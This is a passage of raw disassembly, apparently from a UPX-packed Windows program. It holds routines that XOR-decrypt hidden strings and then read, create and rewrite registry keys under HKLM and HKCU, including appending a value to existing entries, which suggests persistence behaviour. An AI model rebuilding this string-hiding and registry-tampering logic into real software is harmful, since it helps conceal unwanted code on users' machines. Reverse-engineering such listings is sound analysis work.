push offset dword_429070
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+18h]
mov edi, edi
loc_406020: ; CODE XREF: sub_405FB0+78�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_406020
push 10h
push offset dword_4290A0
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+30h]
mov edi, edi
loc_406040: ; CODE XREF: sub_405FB0+98�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_406040
push 6
push offset dword_4290B0
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+20h]
mov edi, edi
loc_406060: ; CODE XREF: sub_405FB0+B8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_406060
push 9
push offset dword_4290B8
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+28h]
mov edi, edi
loc_406080: ; CODE XREF: sub_405FB0+D8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_406080
push 8
push offset dword_4290C4
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+38h]
mov edi, edi
loc_4060A0: ; CODE XREF: sub_405FB0+F8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_4060A0
push 8
push offset dword_4290CC
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+40h]
mov edi, edi
loc_4060C0: ; CODE XREF: sub_405FB0+118�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_4060C0
push 41h
push offset dword_4290D8
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+48h]
mov edi, edi
loc_4060E0: ; CODE XREF: sub_405FB0+138�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_4060E0
push 0Eh
push offset dword_42911C
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+50h]
mov edi, edi
loc_406100: ; CODE XREF: sub_405FB0+158�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_406100
push 13h
push offset dword_42912C
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+6Ch]
mov edi, edi
loc_406120: ; CODE XREF: sub_405FB0+178�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_406120
push 13h
push offset dword_429140
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+5Ch]
mov edi, edi
loc_406140: ; CODE XREF: sub_405FB0+198�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_406140
push 8
push offset dword_429154
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+64h]
mov edi, edi
loc_406160: ; CODE XREF: sub_405FB0+1B8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_406160
mov ecx, [esi+48h]
lea eax, [esp+10h+var_8]
push eax
push 1
push 0
push ecx
push 80000001h
call dword_424010 ; RegOpenKeyExA
test eax, eax
jnz short loc_4061B9
mov eax, [esi+74h]
lea edx, [esp+10h+var_4]
push edx
mov edx, [esi+50h]
push eax
mov eax, [esp+18h+var_8]
lea ecx, [esp+18h+var_C]
push ecx
push 0
push edx
push eax
mov [esp+28h+var_C], 1
call dword_424014 ; RegQueryValueExA
test eax, eax
jz short loc_4061BF
mov ecx, [esi+74h]
mov byte ptr [ecx], 0
jmp short loc_4061BF
; ---------------------------------------------------------------------------
loc_4061B9: ; CODE XREF: sub_405FB0+1D4�j
mov edx, [esi+74h]
mov byte ptr [edx], 0
loc_4061BF: ; CODE XREF: sub_405FB0+1FF�j
; sub_405FB0+207�j
mov eax, [esi+74h]
push eax
call sub_419A76
add esp, 4
mov dword ptr [esi+70h], 1
loc_4061D2: ; CODE XREF: sub_405FB0+B�j
; sub_405FB0+16�j
pop esi
add esp, 0Ch
retn
sub_405FB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4061E0 proc near ; CODE XREF: sub_40C950+8F�p
; sub_40C950+1BD�p
var_A0 = dword ptr -0A0h
var_9C = byte ptr -9Ch
var_98 = byte ptr -98h
var_94 = byte ptr -94h
var_84 = byte ptr -84h
var_4 = dword ptr -4
sub esp, 0A0h
mov eax, dword_42A290
push esi
mov esi, ecx
mov [esp+0A4h+var_4], eax
mov eax, [esi+70h]
test eax, eax
jz loc_406289
mov eax, [esi+8]
lea edx, [esp+0A4h+var_84]
sub edx, eax
lea esp, [esp+0]
loc_406210: ; CODE XREF: sub_4061E0+38�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_406210
lea eax, [esp+0A4h+var_A0]
push eax
push 2001Fh
push 0
lea ecx, [esp+0B0h+var_84]
push ecx
push 80000001h
call dword_424010 ; RegOpenKeyExA
test eax, eax
jnz short loc_406289
push edi
lea edx, [esp+0A8h+var_94]
push edx
call dword_4240D4 ; GetSystemTime
lea eax, [esp+0A8h+var_9C]
push eax
lea ecx, [esp+0ACh+var_94]
push ecx
call dword_4240D0 ; SystemTimeToFileTime
mov eax, [esi+38h]
mov ecx, [esp+0A8h+var_A0]
mov edi, dword_42400C
push 4
lea edx, [esp+0ACh+var_98]
push edx
push 4
push 0
push eax
push ecx
call edi ; RegSetValueExA
mov eax, [esi+40h]
mov ecx, [esp+0A8h+var_A0]
push 4
lea edx, [esp+0ACh+var_9C]
push edx
push 4
push 0
push eax
push ecx
call edi ; RegSetValueExA
pop edi
loc_406289: ; CODE XREF: sub_4061E0+1A�j
; sub_4061E0+58�j
mov ecx, [esp+0A4h+var_4]
pop esi
call sub_4192B6
add esp, 0A0h
retn
sub_4061E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4062A0 proc near ; CODE XREF: sub_40C950+58�p
var_A48 = dword ptr -0A48h
var_A44 = dword ptr -0A44h
var_A40 = byte ptr -0A40h
var_915 = byte ptr -915h
var_910 = byte ptr -910h
var_808 = byte ptr -808h
var_408 = byte ptr -408h
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 0A4Ch
mov eax, dword_42A290
push ebx
mov ebx, ecx
mov [esp+0A50h+var_4], eax
mov eax, [ebx+70h]
test eax, eax
push esi
push edi
jz loc_40665B
mov eax, [ebx+10h]
lea edx, [esp+0A58h+var_910]
sub edx, eax
loc_4062D4: ; CODE XREF: sub_4062A0+3C�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_4062D4
lea eax, [esp+0A58h+var_A48]
push eax
push 2001Fh
push 0
lea ecx, [esp+0A64h+var_910]
push ecx
push 80000002h
call dword_424010 ; RegOpenKeyExA
test eax, eax
jnz loc_406589
mov ecx, [ebx+20h]
lea edx, [esp+0A58h+var_A44]
push edx
mov edx, [esp+0A5Ch+var_A48]
lea eax, [esp+0A5Ch+var_408]
push eax
push 0
push 0
push ecx
push edx
mov [esp+0A70h+var_A44], 400h
call dword_424014 ; RegQueryValueExA
mov esi, eax
lea eax, [esp+0A58h+var_408]
push offset dword_4243F4
push eax
xor edi, edi
call sub_419C6F
add esp, 8
test eax, eax
jz short loc_406381
lea ebx, [ebx+0]
loc_406350: ; CODE XREF: sub_4062A0+D8�j
mov ecx, [ebx+4]
add ecx, 108h
push ecx
push eax
call sub_419312
add esp, 8
test eax, eax
jz short loc_40637C
push offset dword_4243F4
push 0
call sub_419C6F
add esp, 8
test eax, eax
jnz short loc_406350
jmp short loc_406381
; ---------------------------------------------------------------------------
loc_40637C: ; CODE XREF: sub_4062A0+C5�j
mov edi, 1
loc_406381: ; CODE XREF: sub_4062A0+A8�j
; sub_4062A0+DA�j
test esi, esi
jnz loc_40643D
test edi, edi
jnz loc_40643D
mov ecx, 4Ah
mov eax, 20202020h
lea edi, [esp+0A58h+var_A40]
rep stosd
stosw
stosb
lea eax, [esp+0A58h+var_A40]
mov [esp+0A58h+var_915], 0
mov edx, eax
loc_4063B2: ; CODE XREF: sub_4062A0+117�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4063B2
lea edi, [esp+0A58h+var_408]
sub eax, edx
dec edi
loc_4063C3: ; CODE XREF: sub_4062A0+129�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4063C3
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
mov eax, [ebx+4]
and ecx, 3
add eax, 108h
rep movsb
mov ecx, eax
loc_4063E5: ; CODE XREF: sub_4062A0+14A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4063E5
lea edi, [esp+0A58h+var_408]
sub eax, ecx
mov esi, ecx
dec edi
loc_4063F8: ; CODE XREF: sub_4062A0+15E�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4063F8
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [esp+0A58h+var_408]
rep movsb
lea edx, [eax+1]
loc_406418: ; CODE XREF: sub_4062A0+17D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_406418
mov ecx, [esp+0A58h+var_A48]
sub eax, edx
push eax
mov eax, [ebx+20h]
lea edx, [esp+0A5Ch+var_408]
push edx
push 1
push 0
push eax
push ecx
call dword_42400C ; RegSetValueExA
loc_40643D: ; CODE XREF: sub_4062A0+E3�j
; sub_4062A0+EB�j
mov ecx, [ebx+28h]
lea edx, [esp+0A58h+var_A44]
push edx
mov edx, [esp+0A5Ch+var_A48]
lea eax, [esp+0A5Ch+var_808]
push eax
push 0
push 0
push ecx
push edx
mov [esp+0A70h+var_A44], 400h
call dword_424014 ; RegQueryValueExA
mov edi, eax
lea eax, [esp+0A58h+var_808]
push offset dword_4243F4
push eax
xor esi, esi
call sub_419C6F
add esp, 8
test eax, eax
jz short loc_4064B3
loc_406482: ; CODE XREF: sub_4062A0+20A�j
mov ecx, [ebx+4]
add ecx, 108h
push ecx
push eax
call sub_419312
add esp, 8
test eax, eax
jz short loc_4064AE
push offset dword_4243F4
push 0
call sub_419C6F
add esp, 8
test eax, eax
jnz short loc_406482
jmp short loc_4064B3
; ---------------------------------------------------------------------------
loc_4064AE: ; CODE XREF: sub_4062A0+1F7�j
mov esi, 1
loc_4064B3: ; CODE XREF: sub_4062A0+1E0�j
; sub_4062A0+20C�j
test edi, edi
jnz loc_406589
test esi, esi
jnz loc_406589
mov ecx, 4Ah
mov eax, 20202020h
lea edi, [esp+0A58h+var_A40]
rep stosd
stosw
stosb
lea eax, [esp+0A58h+var_A40]
mov [esp+0A58h+var_915], 0
mov edx, eax
loc_4064E4: ; CODE XREF: sub_4062A0+249�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4064E4
lea edi, [esp+0A58h+var_808]
sub eax, edx
dec edi
loc_4064F5: ; CODE XREF: sub_4062A0+25B�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4064F5
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea edi, [esp+0A58h+var_808]
dec edi
loc_406515: ; CODE XREF: sub_4062A0+27B�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_406515
mov dx, word_42445C
mov eax, [ebx+4]
add eax, 108h
mov [edi], dx
mov edx, eax
loc_406531: ; CODE XREF: sub_4062A0+296�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_406531
lea edi, [esp+0A58h+var_808]
sub eax, edx
dec edi
loc_406542: ; CODE XREF: sub_4062A0+2A8�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_406542
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [esp+0A58h+var_808]
rep movsb
lea edx, [eax+1]
loc_406564: ; CODE XREF: sub_4062A0+2C9�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_406564
mov ecx, [ebx+28h]
sub eax, edx
mov edx, [esp+0A58h+var_A48]
push eax
lea eax, [esp+0A5Ch+var_808]
push eax
push 1
push 0
push ecx
push edx
call dword_42400C ; RegSetValueExA
loc_406589: ; CODE XREF: sub_4062A0+5F�j
; sub_4062A0+215�j ...
mov eax, [esp+0A58h+var_A48]
mov edi, dword_424008
push eax
call edi ; RegCloseKey
mov eax, [ebx+18h]
lea edx, [esp+0A58h+var_910]
sub edx, eax
loc_4065A2: ; CODE XREF: sub_4062A0+30A�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_4065A2
lea ecx, [esp+0A58h+var_A48]
push ecx
push 2001Fh
push 0
lea edx, [esp+0A64h+var_910]
push edx
push 80000002h
call dword_424010 ; RegOpenKeyExA
test eax, eax
jnz short loc_4065FE
mov eax, [ebx+4]
lea ecx, [eax+108h]
mov eax, ecx
lea esi, [eax+1]
lea ecx, [ecx+0]
loc_4065E0: ; CODE XREF: sub_4062A0+345�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4065E0
sub eax, esi
push eax
mov eax, [ebx+30h]
push ecx
mov ecx, [esp+0A60h+var_A48]
push 1
push 0
push eax
push ecx
call dword_42400C ; RegSetValueExA
loc_4065FE: ; CODE XREF: sub_4062A0+32D�j
mov edx, [esp+0A58h+var_A48]
push edx
call edi ; RegCloseKey
lea eax, [esp+0A58h+var_A48]
push eax
push 2001Fh
push 0
lea ecx, [esp+0A64h+var_910]
push ecx
push 80000001h
call dword_424010 ; RegOpenKeyExA
test eax, eax
jnz short loc_406654
mov eax, [ebx+4]
lea ecx, [eax+108h]
mov eax, ecx
lea esi, [eax+1]
loc_406636: ; CODE XREF: sub_4062A0+39B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_406636
mov edx, [ebx+30h]
sub eax, esi
push eax
mov eax, [esp+0A5Ch+var_A48]
push ecx
push 1
push 0
push edx
push eax
call dword_42400C ; RegSetValueExA
loc_406654: ; CODE XREF: sub_4062A0+386�j
mov ecx, [esp+0A58h+var_A48]
push ecx
call edi ; RegCloseKey
loc_40665B: ; CODE XREF: sub_4062A0+22�j
mov ecx, [esp+0A58h+var_4]
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4062A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406670 proc near ; CODE XREF: sub_403950+9A�p
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 0Ch
push ebx
mov ebx, [esp+10h+arg_0]
test ebx, ebx
push esi
mov esi, ecx
jnz short loc_406689
pop esi
xor eax, eax
pop ebx
add esp, 0Ch
retn 4
; ---------------------------------------------------------------------------
loc_406689: ; CODE XREF: sub_406670+D�j
mov edx, [esi+5Ch]
push edi
mov edi, dword_424004
lea eax, [esp+18h+var_C]
push eax
lea ecx, [esp+1Ch+arg_0]
push ecx
push 0
push 0F003Fh
push 0
push 0
push 0
push edx
push 80000002h
call edi ; RegCreateKeyExA
test eax, eax
jz short loc_4066E7
mov edx, [esi+5Ch]
lea eax, [esp+18h+var_C]
push eax
lea ecx, [esp+1Ch+arg_0]
push ecx
push 0
push 0F003Fh
push 0
push 0
push 0
push edx
push 80000001h
call edi ; RegCreateKeyExA
test eax, eax
jz short loc_4066E7
pop edi
pop esi
xor eax, eax
pop ebx
add esp, 0Ch
retn 4
; ---------------------------------------------------------------------------
loc_4066E7: ; CODE XREF: sub_406670+44�j
; sub_406670+6A�j
mov edx, [esi+64h]
mov eax, 4
mov [esp+18h+var_8], eax
mov [esp+18h+var_4], eax
lea eax, [esp+18h+var_8]
push eax
mov eax, [esp+1Ch+arg_0]
push ebx
lea ecx, [esp+20h+var_4]
push ecx
push 0
push edx
push eax
call dword_424014 ; RegQueryValueExA
test eax, eax
jz short loc_40671A
mov dword ptr [ebx], 0
loc_40671A: ; CODE XREF: sub_406670+A2�j
pop edi
pop esi
mov eax, 1
pop ebx
add esp, 0Ch
retn 4
sub_406670 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406730 proc near ; CODE XREF: sub_403950+C1�p
; sub_403950+8BF�p
var_4 = byte ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
mov ebx, [esp+8+arg_0]
test ebx, ebx
push esi
mov esi, ecx
jnz short loc_406745
pop esi
xor eax, eax
pop ebx
pop ecx
retn 4
; ---------------------------------------------------------------------------
loc_406745: ; CODE XREF: sub_406730+B�j
mov edx, [esi+5Ch]
push edi
mov edi, dword_424004
lea eax, [esp+10h+var_4]
push eax
lea ecx, [esp+14h+arg_0]
push ecx
push 0
push 0F003Fh
push 0
push 0
push 0
push edx
push 80000002h
call edi ; RegCreateKeyExA
test eax, eax
jz short loc_4067A1
mov edx, [esi+5Ch]
lea eax, [esp+10h+var_4]
push eax
lea ecx, [esp+14h+arg_0]
push ecx
push 0
push 0F003Fh
push 0
push 0
push 0
push edx
push 80000001h
call edi ; RegCreateKeyExA
test eax, eax
jz short loc_4067A1
pop edi
pop esi
xor eax, eax
pop ebx
pop ecx
retn 4
; ---------------------------------------------------------------------------
loc_4067A1: ; CODE XREF: sub_406730+40�j
; sub_406730+66�j
mov eax, [esi+64h]
mov ecx, [esp+10h+arg_0]
push 4
push ebx
push 4
push 0
push eax
push ecx
call dword_42400C ; RegSetValueExA
pop edi
pop esi
mov eax, 1
pop ebx
pop ecx
retn 4
sub_406730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4067D0 proc near ; CODE XREF: sub_403950+9C5�p
var_150 = dword ptr -150h
var_14C = byte ptr -14Ch
var_148 = byte ptr -148h
var_144 = byte ptr -144h
var_140 = dword ptr -140h
var_13C = byte ptr -13Ch
var_138 = dword ptr -138h
var_134 = byte ptr -134h
var_130 = byte ptr -130h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
var_124 = byte ptr -124h
var_120 = byte ptr -120h
var_11C = byte ptr -11Ch
var_118 = byte ptr -118h
var_110 = byte ptr -110h
var_10F = byte ptr -10Fh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 154h
mov eax, dword_42A290
push ebx
mov ebx, [ebp+arg_0]
test ebx, ebx
push esi
push edi
mov [esp+160h+var_4], eax
mov edi, ecx
jz short loc_406846
mov edx, [edi+6Ch]
mov esi, dword_424004
lea eax, [esp+160h+var_134]
push eax
lea ecx, [esp+164h+var_150]
push ecx
push 0
push 0F003Fh
push 0
push 0
push 0
push edx
push 80000002h
call esi ; RegCreateKeyExA
test eax, eax
jz short loc_40685D
mov edx, [edi+6Ch]
lea eax, [esp+160h+var_134]
push eax
lea ecx, [esp+164h+var_150]
push ecx
push 0
push 0F003Fh
push 0
push 0
push 0
push edx
push 80000001h
call esi ; RegCreateKeyExA
test eax, eax
jz short loc_40685D
loc_406846: ; CODE XREF: sub_4067D0+22�j
xor eax, eax
mov ecx, [esp+160h+var_4]
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_40685D: ; CODE XREF: sub_4067D0+4E�j
; sub_4067D0+74�j
xor eax, eax
mov [esp+160h+var_110], 0
mov ecx, 40h
lea edi, [esp+160h+var_10F]
rep stosd
stosw
stosb
lea eax, [esp+160h+var_118]
push eax
lea ecx, [esp+164h+var_11C]
push ecx
lea edx, [esp+168h+var_128]
push edx
lea eax, [esp+16Ch+var_130]
push eax
lea ecx, [esp+170h+var_120]
push ecx
lea edx, [esp+174h+var_12C]
push edx
lea eax, [esp+178h+var_124]
push eax
lea ecx, [esp+17Ch+var_138]
push ecx
mov ecx, [esp+180h+var_150]
xor esi, esi
push esi
lea edx, [esp+184h+var_13C]
push edx
lea eax, [esp+188h+var_110]
push eax
push ecx
mov dword ptr [esp+190h+var_13C], 104h
mov [esp+190h+var_138], esi
call dword_424018 ; RegQueryInfoKeyA
mov edx, [ebx]
imul edx, 204h
mov eax, 4
mov dword ptr [esp+160h+var_14C], eax
mov dword ptr [esp+160h+var_144], eax
lea eax, [edx+ebx]
lea edx, [eax+4]
lea ecx, [esp+160h+var_144]
push ecx
push edx
lea ecx, [esp+168h+var_14C]
push ecx
push esi
lea edx, [esp+170h+var_148]
push edx
add eax, 108h
push eax
mov eax, [esp+178h+var_150]
push esi
push eax
mov [esp+180h+var_140], esi
mov dword ptr [esp+180h+var_148], 100h
call dword_424000 ; RegEnumValueA
test eax, eax
jnz short loc_406987
lea esp, [esp+0]
loc_406910: ; CODE XREF: sub_4067D0+1B5�j
mov eax, [ebx]
mov ecx, eax
imul ecx, 204h
lea esi, [ecx+ebx+108h]
mov edi, offset byte_4243C3
mov ecx, 1
xor edx, edx
repe cmpsb
jz short loc_406934
inc eax
mov [ebx], eax
loc_406934: ; CODE XREF: sub_4067D0+15F�j
mov ecx, [esp+160h+var_140]
mov eax, 4
mov dword ptr [esp+160h+var_14C], eax
mov dword ptr [esp+160h+var_144], eax
mov eax, [ebx]
imul eax, 204h
add eax, ebx
lea edx, [esp+160h+var_144]
push edx
lea edx, [eax+4]
push edx
lea edx, [esp+168h+var_14C]
push edx
push 0
lea edx, [esp+170h+var_148]
push edx
add eax, 108h
push eax
mov eax, [esp+178h+var_150]
inc ecx
push ecx
push eax
mov [esp+180h+var_140], ecx
mov dword ptr [esp+180h+var_148], 100h
call dword_424000 ; RegEnumValueA
test eax, eax
jz short loc_406910
loc_406987: ; CODE XREF: sub_4067D0+13A�j
mov ecx, [esp+160h+var_4]
mov eax, 1
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_4067D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4069B0 proc near ; CODE XREF: sub_403950+A15�p
var_4 = byte ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
mov ebx, [esp+8+arg_0]
test ebx, ebx
push esi
mov esi, ecx
jnz short loc_4069C5
pop esi
xor eax, eax
pop ebx
pop ecx
retn 4
; ---------------------------------------------------------------------------
loc_4069C5: ; CODE XREF: sub_4069B0+B�j
mov edx, [esi+6Ch]
push edi
mov edi, dword_424004
lea eax, [esp+10h+var_4]
push eax
lea ecx, [esp+14h+arg_0]
push ecx
push 0
push 0F003Fh
push 0
push 0
push 0
push edx
push 80000002h
call edi ; RegCreateKeyExA
test eax, eax
jz short loc_406A21
mov edx, [esi+6Ch]
lea eax, [esp+10h+var_4]
push eax
lea ecx, [esp+14h+arg_0]
push ecx
push 0
push 0F003Fh
push 0
push 0
push 0
push edx
push 80000001h
call edi ; RegCreateKeyExA
test eax, eax
jz short loc_406A21
pop edi
pop esi
xor eax, eax
pop ebx
pop ecx
retn 4
; ---------------------------------------------------------------------------
loc_406A21: ; CODE XREF: sub_4069B0+40�j
; sub_4069B0+66�j
mov eax, [ebx]
xor edi, edi
test eax, eax
jle short loc_406A63
push ebp
mov ebp, dword_42400C
lea esi, [ebx+108h]
jmp short loc_406A40
; ---------------------------------------------------------------------------
align 10h
loc_406A40: ; CODE XREF: sub_4069B0+86�j
; sub_4069B0+B0�j
mov ecx, [esp+14h+arg_0]
push 4
lea eax, [esi-104h]
push eax
push 4
push 0
push esi
push ecx
call ebp ; RegSetValueExA
mov eax, [ebx]
inc edi
add esi, 204h
cmp edi, eax
jl short loc_406A40
pop ebp
loc_406A63: ; CODE XREF: sub_4069B0+77�j
pop edi
pop esi
mov eax, 1
pop ebx
pop ecx
retn 4
sub_4069B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406A70 proc near ; CODE XREF: sub_406AE0+55�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_0]
test eax, eax
jz short locret_406ADD
push ebx
mov ebx, [esp+4+arg_4]
test ebx, ebx
jz short loc_406ADC
push esi
mov esi, [esp+8+arg_8]
test esi, esi
jz short loc_406ADB
push ebp
mov ebp, [esp+0Ch+arg_C]
push ebp
call sub_4191BC
mov [ebx], eax
add esp, 4
xor eax, eax
test ebp, ebp
jbe short loc_406ADA
push edi
loc_406AA1: ; CODE XREF: sub_406A70+67�j
mov edi, [esi+4]
test edi, edi
jnz short loc_406AAC
xor cl, cl
jmp short loc_406AC6
; ---------------------------------------------------------------------------
loc_406AAC: ; CODE XREF: sub_406A70+36�j
mov ecx, [esi+0Ch]
mov dl, [ecx+edi]
mov edi, [esi+8]
inc ecx
cmp ecx, edi
mov [esi+0Ch], ecx
jb short loc_406AC4
mov dword ptr [esi+0Ch], 0
loc_406AC4: ; CODE XREF: sub_406A70+4B�j
mov cl, dl
loc_406AC6: ; CODE XREF: sub_406A70+3A�j
mov edx, [esp+10h+arg_0]
mov dl, [eax+edx]
xor dl, cl
mov ecx, [ebx]
mov [eax+ecx], dl
inc eax
cmp eax, ebp
jb short loc_406AA1
pop edi
loc_406ADA: ; CODE XREF: sub_406A70+2E�j
pop ebp
loc_406ADB: ; CODE XREF: sub_406A70+18�j
pop esi
loc_406ADC: ; CODE XREF: sub_406A70+F�j
pop ebx
locret_406ADD: ; CODE XREF: sub_406A70+6�j
retn
sub_406A70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406AE0 proc near ; CODE XREF: sub_401FC0+9F�p
; sub_401FC0+CE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
mov eax, [esi+4]
test eax, eax
push edi
jnz short loc_406B12
push 80h
call sub_4191BC
push 80h
push offset loc_428778
push eax
mov [esi+4], eax
call sub_401000
add esp, 10h
mov dword ptr [esi+8], 80h
loc_406B12: ; CODE XREF: sub_406AE0+9�j
mov eax, [esi+10h]
push 0FFFFFFFFh
push eax
call dword_4240DC ; WaitForSingleObject
mov ecx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
push ecx
push esi
lea edx, [esp+10h+arg_4]
push edx
push eax
mov dword ptr [esi+0Ch], 0
call sub_406A70
mov ecx, [esi+10h]
add esp, 10h
push ecx
call dword_4240D8 ; SetEvent
mov edi, [esp+8+arg_4]
push 0
push edi
lea ecx, [esi+14h]
call sub_410740
mov eax, edi
pop edi
pop esi
retn 8
sub_406AE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406B60 proc near ; CODE XREF: sub_423530+F�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 0FFFFFFFFh
push offset SEH_406B60
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ebx
push ebp
push esi
mov esi, ecx
mov dword ptr [esi], offset off_424460
push edi
xor edi, edi
mov ebx, 1
mov [esp+20h+var_10], esi
mov [esi+18h], edi
mov [esi+1Ch], edi
mov [esi+20h], edi
mov [esi+24h], edi
mov [esi+2Ch], edi
mov [esi+28h], ebx
lea ebp, [esi+30h]
mov ecx, ebp
mov [esp+20h+var_4], edi
call sub_406CB0
mov ecx, ebp
mov byte ptr [esp+20h+var_4], bl
mov [esi+4], edi
mov [esi+8], edi
mov [esi+0Ch], edi
call sub_406CE0
push edi
push ebx
push edi
push edi
call dword_4240E0 ; CreateEventA
mov ebx, [esp+20h+arg_0]
cmp ebx, edi
mov [esi+10h], eax
jz short loc_406C01
mov eax, [esi+4]
cmp eax, edi
jz short loc_406BE6
push eax
call sub_4198AE
add esp, 4
loc_406BE6: ; CODE XREF: sub_406B60+7B�j
mov edi, [esp+20h+arg_4]
push edi
call sub_4191BC
push edi
push ebx
push eax
mov [esi+4], eax
call sub_401000
add esp, 10h
mov [esi+8], edi
loc_406C01: ; CODE XREF: sub_406B60+74�j
mov ecx, [esp+20h+var_C]
pop edi
mov eax, esi
pop esi
pop ebp
pop ebx
mov large fs:0, ecx
add esp, 10h
retn 8
sub_406B60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406C20 proc near ; CODE XREF: UPX0:00406C93�p
; sub_423530+A5�j
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push 0FFFFFFFFh
push offset SEH_406C20
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push esi
mov esi, ecx
mov [esp+14h+var_10], esi
mov dword ptr [esi], offset off_424460
mov eax, [esi+4]
test eax, eax
mov [esp+14h+var_4], 0
jz short loc_406C5B
push eax
call sub_4198AE
add esp, 4
loc_406C5B: ; CODE XREF: sub_406C20+30�j
mov eax, [esi+10h]
push eax
call dword_42406C ; CloseHandle
lea ecx, [esi+30h]
call nullsub_1
add esi, 14h
loc_406C70: ; CODE XREF: sub_406C20+5B�j
push 0
mov ecx, esi
call sub_408220
test eax, eax
jnz short loc_406C70
mov ecx, [esp+14h+var_C]
pop esi
mov large fs:0, ecx
add esp, 10h
retn
sub_406C20 endp
; ---------------------------------------------------------------------------
align 10h
loc_406C90: ; DATA XREF: UPX0:off_424460�o
push esi
mov esi, ecx
call sub_406C20
test byte ptr [esp+8], 1
jz short loc_406CA8
push esi
call sub_41930D
add esp, 4
loc_406CA8: ; CODE XREF: UPX0:00406C9D�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406CB0 proc near ; CODE XREF: sub_406B60+48�p
mov eax, ecx
xor ecx, ecx
mov dword ptr [eax], 0E1Dh
mov dword ptr [eax+4], 0B0E9h
mov dword ptr [eax+8], 34536h
